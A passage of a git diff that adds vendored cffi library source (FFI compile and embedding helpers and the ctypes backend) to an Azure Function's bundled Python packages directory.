*PTBYTE;" + "typedef TCHAR *PTCHAR;") + self._windows_unicode = enabled_flag + + def _apply_windows_unicode(self, kwds): + defmacros = kwds.get('define_macros', ()) + if not isinstance(defmacros, (list, tuple)): + raise TypeError("'define_macros' must be a list or tuple") + defmacros = list(defmacros) + [('UNICODE', '1'), + ('_UNICODE', '1')] + kwds['define_macros'] = defmacros + + def _apply_embedding_fix(self, kwds): + # must include an argument like "-lpython2.7" for the compiler + def ensure(key, value): + lst = kwds.setdefault(key, []) + if value not in lst: + lst.append(value) + # + if '__pypy__' in sys.builtin_module_names: + import os + if sys.platform == "win32": + # we need 'libpypy-c.lib'. Current distributions of + # pypy (>= 4.1) contain it as 'libs/python27.lib'. + pythonlib = "python{0[0]}{0[1]}".format(sys.version_info) + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'libs')) + else: + # we need 'libpypy-c.{so,dylib}', which should be by + # default located in 'sys.prefix/bin' for installed + # systems. + if sys.version_info < (3,): + pythonlib = "pypy-c" + else: + pythonlib = "pypy3-c" + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'bin')) + # On uninstalled pypy's, the libpypy-c is typically found in + # .../pypy/goal/. + if hasattr(sys, 'prefix'): + ensure('library_dirs', os.path.join(sys.prefix, 'pypy', 'goal')) + else: + if sys.platform == "win32": + template = "python%d%d" + if hasattr(sys, 'gettotalrefcount'): + template += '_d' + else: + try: + import sysconfig + except ImportError: # 2.6 + from distutils import sysconfig + template = "python%d.%d" + if sysconfig.get_config_var('DEBUG_EXT'): + template += sysconfig.get_config_var('DEBUG_EXT') + pythonlib = (template % + (sys.hexversion >> 24, (sys.hexversion >> 16) & 0xff)) + if hasattr(sys, 'abiflags'): + pythonlib += sys.abiflags + ensure('libraries', pythonlib) + if sys.platform == "win32": + ensure('extra_link_args', '/MANIFEST') + + def set_source(self, module_name, source, source_extension='.c', **kwds): + import os + if hasattr(self, '_assigned_source'): + raise ValueError("set_source() cannot be called several times " + "per ffi object") + if not isinstance(module_name, basestring): + raise TypeError("'module_name' must be a string") + if os.sep in module_name or (os.altsep and os.altsep in module_name): + raise ValueError("'module_name' must not contain '/': use a dotted " + "name to make a 'package.module' location") + self._assigned_source = (str(module_name), source, + source_extension, kwds) + + def set_source_pkgconfig(self, module_name, pkgconfig_libs, source, + source_extension='.c', **kwds): + from . import pkgconfig + if not isinstance(pkgconfig_libs, list): + raise TypeError("the pkgconfig_libs argument must be a list " + "of package names") + kwds2 = pkgconfig.flags_from_pkgconfig(pkgconfig_libs) + pkgconfig.merge_flags(kwds, kwds2) + self.set_source(module_name, source, source_extension, **kwds) + + def distutils_extension(self, tmpdir='build', verbose=True): + from distutils.dir_util import mkpath + from .recompiler import recompile + # + if not hasattr(self, '_assigned_source'): + if hasattr(self, 'verifier'): # fallback, 'tmpdir' ignored + return self.verifier.get_extension() + raise ValueError("set_source() must be called before" + " distutils_extension()") + module_name, source, source_extension, kwds = self._assigned_source + if source is None: + raise TypeError("distutils_extension() is only for C extension " + "modules, not for dlopen()-style pure Python " + "modules") + mkpath(tmpdir) + ext, updated = recompile(self, module_name, + source, tmpdir=tmpdir, extradir=tmpdir, + source_extension=source_extension, + call_c_compiler=False, **kwds) + if verbose: + if updated: + sys.stderr.write("regenerated: %r\n" % (ext.sources[0],)) + else: + sys.stderr.write("not modified: %r\n" % (ext.sources[0],)) + return ext + + def emit_c_code(self, filename): + from .recompiler import recompile + # + if not hasattr(self, '_assigned_source'): + raise ValueError("set_source() must be called before emit_c_code()") + module_name, source, source_extension, kwds = self._assigned_source + if source is None: + raise TypeError("emit_c_code() is only for C extension modules, " + "not for dlopen()-style pure Python modules") + recompile(self, module_name, source, + c_file=filename, call_c_compiler=False, **kwds) + + def emit_python_code(self, filename): + from .recompiler import recompile + # + if not hasattr(self, '_assigned_source'): + raise ValueError("set_source() must be called before emit_c_code()") + module_name, source, source_extension, kwds = self._assigned_source + if source is not None: + raise TypeError("emit_python_code() is only for dlopen()-style " + "pure Python modules, not for C extension modules") + recompile(self, module_name, source, + c_file=filename, call_c_compiler=False, **kwds) + + def compile(self, tmpdir='.', verbose=0, target=None, debug=None): + """The 'target' argument gives the final file name of the + compiled DLL. Use '*' to force distutils' choice, suitable for + regular CPython C API modules. Use a file name ending in '.*' + to ask for the system's default extension for dynamic libraries + (.so/.dll/.dylib). + + The default is '*' when building a non-embedded C API extension, + and (module_name + '.*') when building an embedded library. + """ + from .recompiler import recompile + # + if not hasattr(self, '_assigned_source'): + raise ValueError("set_source() must be called before compile()") + module_name, source, source_extension, kwds = self._assigned_source + return recompile(self, module_name, source, tmpdir=tmpdir, + target=target, source_extension=source_extension, + compiler_verbose=verbose, debug=debug, **kwds) + + def init_once(self, func, tag): + # Read _init_once_cache[tag], which is either (False, lock) if + # we're calling the function now in some thread, or (True, result). + # Don't call setdefault() in most cases, to avoid allocating and + # immediately freeing a lock; but still use setdefaut() to avoid + # races. + try: + x = self._init_once_cache[tag] + except KeyError: + x = self._init_once_cache.setdefault(tag, (False, allocate_lock())) + # Common case: we got (True, result), so we return the result. + if x[0]: + return x[1] + # Else, it's a lock. Acquire it to serialize the following tests. + with x[1]: + # Read again from _init_once_cache the current status. + x = self._init_once_cache[tag] + if x[0]: + return x[1] + # Call the function and store the result back. + result = func() + self._init_once_cache[tag] = (True, result) + return result + + def embedding_init_code(self, pysource): + if self._embedding: + raise ValueError("embedding_init_code() can only be called once") + # fix 'pysource' before it gets dumped into the C file: + # - remove empty lines at the beginning, so it starts at "line 1" + # - dedent, if all non-empty lines are indented + # - check for SyntaxErrors + import re + match = re.match(r'\s*\n', pysource) + if match: + pysource = pysource[match.end():] + lines = pysource.splitlines() or [''] + prefix = re.match(r'\s*', lines[0]).group() + for i in range(1, len(lines)): + line = lines[i] + if line.rstrip(): + while not line.startswith(prefix): + prefix = prefix[:-1] + i = len(prefix) + lines = [line[i:]+'\n' for line in lines] + pysource = ''.join(lines) + # + compile(pysource, "cffi_init", "exec") + # + self._embedding = pysource + + def def_extern(self, *args, **kwds): + raise ValueError("ffi.def_extern() is only available on API-mode FFI " + "objects") + + def list_types(self): + """Returns the user type names known to this FFI instance. + This returns a tuple containing three lists of names: + (typedef_names, names_of_structs, names_of_unions) + """ + typedefs = [] + structs = [] + unions = [] + for key in self._parser._declarations: + if key.startswith('typedef '): + typedefs.append(key[8:]) + elif key.startswith('struct '): + structs.append(key[7:]) + elif key.startswith('union '): + unions.append(key[6:]) + typedefs.sort() + structs.sort() + unions.sort() + return (typedefs, structs, unions) + + +def _load_backend_lib(backend, name, flags): + import os + if not isinstance(name, basestring): + if sys.platform != "win32" or name is not None: + return backend.load_library(name, flags) + name = "c" # Windows: load_library(None) fails, but this works + # on Python 2 (backward compatibility hack only) + first_error = None + if '.' in name or '/' in name or os.sep in name: + try: + return backend.load_library(name, flags) + except OSError as e: + first_error = e + import ctypes.util + path = ctypes.util.find_library(name) + if path is None: + if name == "c" and sys.platform == "win32" and sys.version_info >= (3,): + raise OSError("dlopen(None) cannot work on Windows for Python 3 " + "(see http://bugs.python.org/issue23606)") + msg = ("ctypes.util.find_library() did not manage " + "to locate a library called %r" % (name,)) + if first_error is not None: + msg = "%s. Additionally, %s" % (first_error, msg) + raise OSError(msg) + return backend.load_library(path, flags) + +def _make_ffi_library(ffi, libname, flags): + backend = ffi._backend + backendlib = _load_backend_lib(backend, libname, flags) + # + def accessor_function(name): + key = 'function ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + value = backendlib.load_function(BType, name) + library.__dict__[name] = value + # + def accessor_variable(name): + key = 'variable ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + read_variable = backendlib.read_variable + write_variable = backendlib.write_variable + setattr(FFILibrary, name, property( + lambda self: read_variable(BType, name), + lambda self, value: write_variable(BType, name, value))) + # + def addressof_var(name): + try: + return addr_variables[name] + except KeyError: + with ffi._lock: + if name not in addr_variables: + key = 'variable ' + name + tp, _ = ffi._parser._declarations[key] + BType = ffi._get_cached_btype(tp) + if BType.kind != 'array': + BType = model.pointer_cache(ffi, BType) + p = backendlib.load_function(BType, name) + addr_variables[name] = p + return addr_variables[name] + # + def accessor_constant(name): + raise NotImplementedError("non-integer constant '%s' cannot be " + "accessed from a dlopen() library" % (name,)) + # + def accessor_int_constant(name): + library.__dict__[name] = ffi._parser._int_constants[name] + # + accessors = {} + accessors_version = [False] + addr_variables = {} + # + def update_accessors(): + if accessors_version[0] is ffi._cdef_version: + return + # + for key, (tp, _) in ffi._parser._declarations.items(): + if not isinstance(tp, model.EnumType): + tag, name = key.split(' ', 1) + if tag == 'function': + accessors[name] = accessor_function + elif tag == 'variable': + accessors[name] = accessor_variable + elif tag == 'constant': + accessors[name] = accessor_constant + else: + for i, enumname in enumerate(tp.enumerators): + def accessor_enum(name, tp=tp, i=i): + tp.check_not_partial() + library.__dict__[name] = tp.enumvalues[i] + accessors[enumname] = accessor_enum + for name in ffi._parser._int_constants: + accessors.setdefault(name, accessor_int_constant) + accessors_version[0] = ffi._cdef_version + # + def make_accessor(name): + with ffi._lock: + if name in library.__dict__ or name in FFILibrary.__dict__: + return # added by another thread while waiting for the lock + if name not in accessors: + update_accessors() + if name not in accessors: + raise AttributeError(name) + accessors[name](name) + # + class FFILibrary(object): + def __getattr__(self, name): + make_accessor(name) + return getattr(self, name) + def __setattr__(self, name, value): + try: + property = getattr(self.__class__, name) + except AttributeError: + make_accessor(name) + setattr(self, name, value) + else: + property.__set__(self, value) + def __dir__(self): + with ffi._lock: + update_accessors() + return accessors.keys() + def __addressof__(self, name): + if name in library.__dict__: + return library.__dict__[name] + if name in FFILibrary.__dict__: + return addressof_var(name) + make_accessor(name) + if name in library.__dict__: + return library.__dict__[name] + if name in FFILibrary.__dict__: + return addressof_var(name) + raise AttributeError("cffi library has no function or " + "global variable named '%s'" % (name,)) + def __cffi_close__(self): + backendlib.close_lib() + self.__dict__.clear() + # + if isinstance(libname, basestring): + try: + if not isinstance(libname, str): # unicode, on Python 2 + libname = libname.encode('utf-8') + FFILibrary.__name__ = 'FFILibrary_%s' % libname + except UnicodeError: + pass + library = FFILibrary() + return library, library.__dict__ + +def _builtin_function_type(func): + # a hack to make at least ffi.typeof(builtin_function) work, + # if the builtin function was obtained by 'vengine_cpy'. + import sys + try: + module = sys.modules[func.__module__] + ffi = module._cffi_original_ffi + types_of_builtin_funcs = module._cffi_types_of_builtin_funcs + tp = types_of_builtin_funcs[func] + except (KeyError, AttributeError, TypeError): + return None + else: + with ffi._lock: + return ffi._get_cached_btype(tp) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py new file mode 100644 index 0000000..3368a2a --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/cffi/backend_ctypes.py @@ -0,0 +1,1121 @@ +import ctypes, ctypes.util, operator, sys +from . import model + +if sys.version_info < (3,): + bytechr = chr +else: + unicode = str + long = int + xrange = range + bytechr = lambda num: bytes([num]) + +class CTypesType(type): + pass + +class CTypesData(object): + __metaclass__ = CTypesType + __slots__ = ['__weakref__'] + __name__ = '' + + def __init__(self, *args): + raise TypeError("cannot instantiate %r" % (self.__class__,)) + + @classmethod + def _newp(cls, init): + raise TypeError("expected a pointer or array ctype, got '%s'" + % (cls._get_c_name(),)) + + @staticmethod + def _to_ctypes(value): + raise TypeError + + @classmethod + def _arg_to_ctypes(cls, *value): + try: + ctype = cls._ctype + except AttributeError: + raise TypeError("cannot create an instance of %r" % (cls,)) + if value: + res = cls._to_ctypes(*value) + if not isinstance(res, ctype): + res = cls._ctype(res) + else: + res = cls._ctype() + return res + + @classmethod + def _create_ctype_obj(cls, init): + if init is None: + return cls._arg_to_ctypes() + else: + return cls._arg_to_ctypes(init) + + @staticmethod + def _from_ctypes(ctypes_value): + raise TypeError + + @classmethod + def _get_c_name(cls, replace_with=''): + return cls._reftypename.replace(' &', replace_with) + + @classmethod + def _fix_class(cls): + cls.__name__ = 'CData<%s>' % (cls._get_c_name(),) + cls.__qualname__ = 'CData<%s>' % (cls._get_c_name(),) + cls.__module__ = 'ffi' + + def _get_own_repr(self): + raise NotImplementedError + + def _addr_repr(self, address): + if address == 0: + return 'NULL' + else: + if address < 0: + address += 1 << (8*ctypes.sizeof(ctypes.c_void_p)) + return '0x%x' % address + + def __repr__(self, c_name=None): + own = self._get_own_repr() + return '' % (c_name or self._get_c_name(), own) + + def _convert_to_address(self, BClass): + if BClass is None: + raise TypeError("cannot convert %r to an address" % ( + self._get_c_name(),)) + else: + raise TypeError("cannot convert %r to %r" % ( + self._get_c_name(), BClass._get_c_name())) + + @classmethod + def _get_size(cls): + return ctypes.sizeof(cls._ctype) + + def _get_size_of_instance(self): + return ctypes.sizeof(self._ctype) + + @classmethod + def _cast_from(cls, source): + raise TypeError("cannot cast to %r" % (cls._get_c_name(),)) + + def _cast_to_integer(self): + return self._convert_to_address(None) + + @classmethod + def _alignment(cls): + return ctypes.alignment(cls._ctype) + + def __iter__(self): + raise TypeError("cdata %r does not support iteration" % ( + self._get_c_name()),) + + def _make_cmp(name): + cmpfunc = getattr(operator, name) + def cmp(self, other): + v_is_ptr = not isinstance(self, CTypesGenericPrimitive) + w_is_ptr = (isinstance(other, CTypesData) and + not isinstance(other, CTypesGenericPrimitive)) + if v_is_ptr and w_is_ptr: + return cmpfunc(self._convert_to_address(None), + other._convert_to_address(None)) + elif v_is_ptr or w_is_ptr: + return NotImplemented + else: + if isinstance(self, CTypesGenericPrimitive): + self = self._value + if isinstance(other, CTypesGenericPrimitive): + other = other._value + return cmpfunc(self, other) + cmp.func_name = name + return cmp + + __eq__ = _make_cmp('__eq__') + __ne__ = _make_cmp('__ne__') + __lt__ = _make_cmp('__lt__') + __le__ = _make_cmp('__le__') + __gt__ = _make_cmp('__gt__') + __ge__ = _make_cmp('__ge__') + + def __hash__(self): + return hash(self._convert_to_address(None)) + + def _to_string(self, maxlen): + raise TypeError("string(): %r" % (self,)) + + +class CTypesGenericPrimitive(CTypesData): + __slots__ = [] + + def __hash__(self): + return hash(self._value) + + def _get_own_repr(self): + return repr(self._from_ctypes(self._value)) + + +class CTypesGenericArray(CTypesData): + __slots__ = [] + + @classmethod + def _newp(cls, init): + return cls(init) + + def __iter__(self): + for i in xrange(len(self)): + yield self[i] + + def _get_own_repr(self): + return self._addr_repr(ctypes.addressof(self._blob)) + + +class CTypesGenericPtr(CTypesData): + __slots__ = ['_address', '_as_ctype_ptr'] + _automatic_casts = False + kind = "pointer" + + @classmethod + def _newp(cls, init): + return cls(init) + + @classmethod + def _cast_from(cls, source): + if source is None: + address = 0 + elif isinstance(source, CTypesData): + address = source._cast_to_integer() + elif isinstance(source, (int, long)): + address = source + else: + raise TypeError("bad type for cast to %r: %r" % + (cls, type(source).__name__)) + return cls._new_pointer_at(address) + + @classmethod + def _new_pointer_at(cls, address): + self = cls.__new__(cls) + self._address = address + self._as_ctype_ptr = ctypes.cast(address, cls._ctype) + return self + + def _get_own_repr(self): + try: + return self._addr_repr(self._address) + except AttributeError: + return '???' + + def _cast_to_integer(self): + return self._address + + def __nonzero__(self): + return bool(self._address) + __bool__ = __nonzero__ + + @classmethod + def _to_ctypes(cls, value): + if not isinstance(value, CTypesData): + raise TypeError("unexpected %s object" % type(value).__name__) + address = value._convert_to_address(cls) + return ctypes.cast(address, cls._ctype) + + @classmethod + def _from_ctypes(cls, ctypes_ptr): + address = ctypes.cast(ctypes_ptr, ctypes.c_void_p).value or 0 + return cls._new_pointer_at(address) + + @classmethod + def _initialize(cls, ctypes_ptr, value): + if value: + ctypes_ptr.contents = cls._to_ctypes(value).contents + + def _convert_to_address(self, BClass): + if (BClass in (self.__class__, None) or BClass._automatic_casts + or self._automatic_casts): + return self._address + else: + return CTypesData._convert_to_address(self, BClass) + + +class CTypesBaseStructOrUnion(CTypesData): + __slots__ = ['_blob'] + + @classmethod + def _create_ctype_obj(cls, init): + # may be overridden + raise TypeError("cannot instantiate opaque type %s" % (cls,)) + + def _get_own_repr(self): + return self._addr_repr(ctypes.addressof(self._blob)) + + @classmethod + def _offsetof(cls, fieldname): + return getattr(cls._ctype, fieldname).offset + + def _convert_to_address(self, BClass): + if getattr(BClass, '_BItem', None) is self.__class__: + return ctypes.addressof(self._blob) + else: + return CTypesData._convert_to_address(self, BClass) + + @classmethod + def _from_ctypes(cls, ctypes_struct_or_union): + self = cls.__new__(cls) + self._blob = ctypes_struct_or_union + return self + + @classmethod + def _to_ctypes(cls, value): + return value._blob + + def __repr__(self, c_name=None): + return CTypesData.__repr__(self, c_name or self._get_c_name(' &')) + + +class CTypesBackend(object): + + PRIMITIVE_TYPES = { + 'char': ctypes.c_char, + 'short': ctypes.c_short, + 'int': ctypes.c_int, + 'long': ctypes.c_long, + 'long long': ctypes.c_longlong, + 'signed char': ctypes.c_byte, + 'unsigned char': ctypes.c_ubyte, + 'unsigned short': ctypes.c_ushort, + 'unsigned int': ctypes.c_uint, + 'unsigned long': ctypes.c_ulong, + 'unsigned long long': ctypes.c_ulonglong, + 'float': ctypes.c_float, + 'double': ctypes.c_double, + '_Bool': ctypes.c_bool, + } + + for _name in ['unsigned long long', 'unsigned long', + 'unsigned int', 'unsigned short', 'unsigned char']: + _size = ctypes.sizeof(PRIMITIVE_TYPES[_name]) + PRIMITIVE_TYPES['uint%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_void_p): + PRIMITIVE_TYPES['uintptr_t'] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_size_t): + PRIMITIVE_TYPES['size_t'] = PRIMITIVE_TYPES[_name] + + for _name in ['long long', 'long', 'int', 'short', 'signed char']: + _size = ctypes.sizeof(PRIMITIVE_TYPES[_name]) + PRIMITIVE_TYPES['int%d_t' % (8*_size)] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_void_p): + PRIMITIVE_TYPES['intptr_t'] = PRIMITIVE_TYPES[_name] + PRIMITIVE_TYPES['ptrdiff_t'] = PRIMITIVE_TYPES[_name] + if _size == ctypes.sizeof(ctypes.c_size_t): + PRIMITIVE_TYPES['ssize_t'] = PRIMITIVE_TYPES[_name] + + + def __init__(self): + self.RTLD_LAZY = 0 # not supported anyway by ctypes + self.RTLD_NOW = 0 + self.RTLD_GLOBAL = ctypes.RTLD_GLOBAL + self.RTLD_LOCAL = ctypes.RTLD_LOCAL + + def set_ffi(self, ffi): + self.ffi = ffi + + def _get_types(self): + return CTypesData, CTypesType + + def load_library(self, path, flags=0): + cdll = ctypes.CDLL(path, flags) + return CTypesLibrary(self, cdll) + + def new_void_type(self): + class CTypesVoid(CTypesData): + __slots__ = [] + _reftypename = 'void &' + @staticmethod + def _from_ctypes(novalue): + return None + @staticmethod + def _to_ctypes(novalue): + if novalue is not None: + raise TypeError("None expected, got %s object" % + (type(novalue).__name__,)) + return None + CTypesVoid._fix_class() + return CTypesVoid + + def new_primitive_type(self, name): + if name == 'wchar_t': + raise NotImplementedError(name) + ctype = self.PRIMITIVE_TYPES[name] + if name == 'char': + kind = 'char' + elif name in ('float', 'double'): + kind = 'float' + else: + if name in ('signed char', 'unsigned char'): + kind = 'byte' + elif name == '_Bool': + kind = 'bool' + else: + kind = 'int' + is_signed = (ctype(-1).value == -1) + # + def _cast_source_to_int(source): + if isinstance(source, (int, long, float)): + source = int(source) + elif isinstance(source, CTypesData): + source = source._cast_to_integer() + elif isinstance(source, bytes): + source = ord(source) + elif source is None: + source = 0 + else: + raise TypeError("bad type for cast to %r: %r" % + (CTypesPrimitive, type(source).__name__)) + return source + # + kind1 = kind + class CTypesPrimitive(CTypesGenericPrimitive): + __slots__ = ['_value'] + _ctype = ctype + _reftypename = '%s &' % name + kind = kind1 + + def __init__(self, value): + self._value = value + + @staticmethod + def _create_ctype_obj(init): + if init is None: + return ctype() + return ctype(CTypesPrimitive._to_ctypes(init)) + + if kind == 'int' or kind == 'byte': + @classmethod + def _cast_from(cls, source): + source = _cast_source_to_int(source) + source = ctype(source).value # cast within range + return cls(source) + def __int__(self): + return self._value + + if kind == 'bool': + @classmethod + def _cast_from(cls, source): + if not isinstance(source, (int, long, float)): + source = _cast_source_to_int(source) + return cls(bool(source)) + def __int__(self): + return int(self._value) + + if kind == 'char': + @classmethod + def _cast_from(cls, source): + source = _cast_source_to_int(source) + source = bytechr(source & 0xFF) + return cls(source) + def __int__(self): + return ord(self._value) + + if kind == 'float': + @classmethod + def _cast_from(cls, source): + if isinstance(source, float): + pass + elif isinstance(source, CTypesGenericPrimitive): + if hasattr(source, '__float__'): + source = float(source) + else: + source = int(source) + else: + source = _cast_source_to_int(source) + source = ctype(source).value # fix precision + return cls(source) + def __int__(self): + return int(self._value) + def __float__(self): + return self._value + + _cast_to_integer = __int__ + + if kind == 'int' or kind == 'byte' or kind == 'bool': + @staticmethod + def _to_ctypes(x): + if not isinstance(x, (int, long)): + if isinstance(x, CTypesData): + x = int(x) + else: + raise TypeError("integer expected, got %s" % + type(x).__name__) + if ctype(x).value != x: + if not is_signed and x < 0: + raise OverflowError("%s: negative integer" % name) + else: + raise OverflowError("%s: integer out of bounds" + % name) + return x + + if kind == 'char': + @staticmethod + def _to_ctypes(x): + if isinstance(x, bytes) and len(x) == 1: + return x + if isinstance(x, CTypesPrimitive): # > + return x._value + raise TypeError("character expected, got %s" % + type(x).__name__) + def __nonzero__(self): + return ord(self._value) != 0 + else: + def __nonzero__(self): + return self._value != 0 + __bool__ = __nonzero__ + + if kind == 'float': + @staticmethod + def _to_ctypes(x): + if not isinstance(x, (int, long, float, CTypesData)): + raise TypeError("float expected, got %s" % + type(x).__name__) + return ctype(x).value + + @staticmethod + def _from_ctypes(value): + return getattr(value, 'value', value) + + @staticmethod + def _initialize(blob, init): + blob.value = CTypesPrimitive._to_ctypes(init) + + if kind == 'char': + def _to_string(self, maxlen): + return self._value + if kind == 'byte': + def _to_string(self, maxlen): + return chr(self._value & 0xff) + # + CTypesPrimitive._fix_class() + return CTypesPrimitive + + def new_pointer_type(self, BItem): + getbtype = self.ffi._get_cached_btype + if BItem is getbtype(model.PrimitiveType('char')): + kind = 'charp' + elif BItem in (getbtype(model.PrimitiveType('signed char')), + getbtype(model.PrimitiveType('unsigned char'))): + kind = 'bytep' + elif BItem is getbtype(model.void_type): + kind = 'voidp' + else: + kind = 'generic' + # + class CTypesPtr(CTypesGenericPtr): + __slots__ = ['_own'] + if kind == 'charp': + __slots__ += ['__as_strbuf'] + _BItem = BItem + if hasattr(BItem, '_ctype'): + _ctype = ctypes.POINTER(BItem._ctype) + _bitem_size = ctypes.sizeof(BItem._ctype) + else: + _ctype = ctypes.c_void_p + if issubclass(BItem, CTypesGenericArray): + _reftypename = BItem._get_c_name('(* &)') + else: + _reftypename = BItem._get_c_name(' * &') + + def __init__(self, init): + ctypeobj = BItem._create_ctype_obj(init) + if kind == 'charp': + self.__as_strbuf = ctypes.create_string_buffer( + ctypeobj.value + b'\x00') + self._as_ctype_ptr = ctypes.cast( + self.__as_strbuf, self._ctype) + else: + self._as_ctype_ptr = ctypes.pointer(ctypeobj) + self._address = ctypes.cast(self._as_ctype_ptr, + ctypes.c_void_p).value + self._own = True + + def __add__(self, other): + if isinstance(other, (int, long)): + return self._new_pointer_at(self._address + + other * self._bitem_size) + else: + return NotImplemented + + def __sub__(self, other): + if isinstance(other, (int, long)): + return self._new_pointer_at(self._address - + other * self._bitem_size) + elif type(self) is type(other): + return (self._address - other._address) // self._bitem_size + else: + return NotImplemented + + def __getitem__(self, index): + if getattr(self, '_own', False) and index != 0: + raise IndexError + return BItem._from_ctypes(self._as_ctype_ptr[index]) + + def __setitem__(self, index, value): + self._as_ctype_ptr[index] = BItem._to_ctypes(value) + + if kind == 'charp' or kind == 'voidp': + @classmethod + def _arg_to_ctypes(cls, *value): + if value and isinstance(value[0], bytes): + return ctypes.c_char_p(value[0]) + else: + return super(CTypesPtr, cls)._arg_to_ctypes(*value) + + if kind == 'charp' or kind == 'bytep': + def _to_string(self, maxlen): + if maxlen < 0: + maxlen = sys.maxsize + p = ctypes.cast(self._as_ctype_ptr, + ctypes.POINTER(ctypes.c_char)) + n = 0 + while n < maxlen and p[n] != b'\x00': + n += 1 + return b''.join([p[i] for i in range(n)]) + + def _get_own_repr(self): + if getattr(self, '_own', False): + return 'owning %d bytes' % ( + ctypes.sizeof(self._as_ctype_ptr.contents),) + return super(CTypesPtr, self)._get_own_repr() + # + if (BItem is self.ffi._get_cached_btype(model.void_type) or + BItem is self.ffi._get_cached_btype(model.PrimitiveType('char'))): + CTypesPtr._automatic_casts = True + # + CTypesPtr._fix_class() + return CTypesPtr + + def new_array_type(self, CTypesPtr, length): + if length is None: + brackets = ' &[]' + else: + brackets = ' &[%d]' % length + BItem = CTypesPtr._BItem + getbtype = self.ffi._get_cached_btype + if BItem is getbtype(model.PrimitiveType('char')): + kind = 'char' + elif BItem in (getbtype(model.PrimitiveType('signed char')), + getbtype(model.PrimitiveType('unsigned char'))): + kind = 'byte' + else: + kind = 'generic' + # + class CTypesArray(CTypesGenericArray): + __slots__ = ['_blob', '_own'] + if length is not None: + _ctype = BItem._ctype * length + else: + __slots__.append('_ctype') + _reftypename = BItem._get_c_name(brackets) + _declared_length = length + _CTPtr = CTypesPtr + + def __init__(self, init): + if length is None: + if isinstance(init, (int, long)): + len1 = init + init = None + elif kind == 'char' and isinstance(init, bytes): + len1 = len(init) + 1 # extra null + else: + init = tuple(init) + len1 = len(init) + self._ctype = BItem._ctype * len1 + self._blob = self._ctype() + self._own = True + if init is not None: + self._initialize(self._blob, init) + + @staticmethod + def _initialize(blob, init): + if isinstance(init, bytes): + init = [init[i:i+1] for i in range(len(init))] + else: + if isinstance(init, CTypesGenericArray): + if (len(init) != len(blob) or + not isinstance(init, CTypesArray)): + raise TypeError("length/type mismatch: %s" % (init,)) + init = tuple(init) + if len(init) > len(blob): + raise IndexError("too many initializers") + addr = ctypes.cast(blob, ctypes.c_void_p).value + PTR = ctypes.POINTER(BItem._ctype) + itemsize = ctypes.sizeof(BItem._ctype) + for i, value in enumerate(init): + p = ctypes.cast(addr + i * itemsize, PTR) + BItem._initialize(p.contents, value) + + def __len__(self): + return len(self._blob) + + def __getitem__(self, index): + if not (0 <= index < len(self._blob)): + raise IndexError + return BItem._from_ctypes(self._blob[index]) + + def __setitem__(self, index, value): + if not (0 <= index < len(self._blob)): + raise IndexError + self._blob[index] = BItem._to_ctypes(value) + + if kind == 'char' or kind == 'byte': + def _to_string(self, maxlen): + if maxlen < 0: + maxlen = len(self._blob) + p = ctypes.cast(self._blob, + ctypes.POINTER(ctypes.c_char)) + n = 0 + while n < maxlen and p[n] != b'\x00': + n += 1 + return b''.join([p[i] for i in range(n)]) + + def _get_own_repr(self): + if getattr(self, '_own', False): + return 'owning %d bytes' % (ctypes.sizeof(self._blob),) + return super(CTypesArray, self)._get_own_repr() + + def _convert_to_address(self, BClass): + if BClass in (CTypesPtr, None) or BClass._automatic_casts: + return ctypes.addressof(self._blob) + else: + return CTypesData._convert_to_address(self, BClass) + + @staticmethod + def _from_ctypes(ctypes_array): + self = CTypesArray.__new__(CTypesArray) + self._blob = ctypes_array + return self + + @staticmethod + def _arg_to_ctypes(value): + return CTypesPtr._arg_to_ctypes(value) + + def __add__(self, other): + if isinstance(other, (int, long)): + return CTypesPtr._new_pointer_at( + ctypes.addressof(self._blob) + + other * ctypes.sizeof(BItem._ctype)) + else: + return NotImplemented + + @classmethod + def _cast_from(cls, source): + raise NotImplementedError("casting to %r" % ( + cls._get_c_name(),)) + # + CTypesArray._fix_class() + return CTypesArray + + def _new_struct_or_union(self, kind, name, base_ctypes_class): + # + class struct_or_union(base_ctypes_class): + pass + struct_or_union.__name__ = '%s_%s' % (kind, name) + kind1 = kind + # + class CTypesStructOrUnion(CTypesBaseStructOrUnion): + __slots__ = ['_blob'] + _ctype = struct_or_union + _reftypename = '%s &' % (name,) + _kind = kind = kind1 + # + CTypesStructOrUnion._fix_class() + return CTypesStructOrUnion + + def new_struct_type(self, name): + return self._new_struct_or_union('struct', name, ctypes.Structure) + + def new_union_type(self, name): + return self._new_struct_or_union('union', name, ctypes.Union) + + def complete_struct_or_union(self, CTypesStructOrUnion, fields, tp, + totalsize=-1, totalalignment=-1, sflags=0, + pack=0): + if totalsize >= 0 or totalalignment >= 0: + raise NotImplementedError("the ctypes backend of CFFI does not support " + "structures completed by verify(); please " + "compile and install the _cffi_backend module.") + struct_or_union = CTypesStructOrUnion._ctype + fnames = [fname for (fname, BField, bitsize) in fields] + btypes = [BField for (fname, BField, bitsize) in fields] + bitfields = [bitsize for (fname, BField, bitsize) in fields] + # + bfield_types = {} + cfields = [] + for (fname, BField, bitsize) in fields: + if bitsize < 0: + cfields.append((fname, BField._ctype)) + bfield_types[fname] = BField + else: + cfields.append((fname, BField._ctype, bitsize)) + bfield_types[fname] = Ellipsis + if sflags & 8: + struct_or_union._pack_ = 1 + elif pack: + struct_or_union._pack_ = pack + struct_or_union._fields_ = cfields + CTypesStructOrUnion._bfield_types = bfield_types + # + @staticmethod + def _create_ctype_obj(init): + result = struct_or_union() + if init is not None: + initialize(result, init) + return result + CTypesStructOrUnion._create_ctype_obj = _create_ctype_obj + # + def initialize(blob, init): + if is_union: + if len(init) > 1: + raise ValueError("union initializer: %d items given, but " + "only one supported (use a dict if needed)" + % (len(init),)) + if not isinstance(init, dict): + if isinstance(init, (bytes, unicode)): + raise TypeError("union initializer: got a str") + init = tuple(init) + if len(init) > 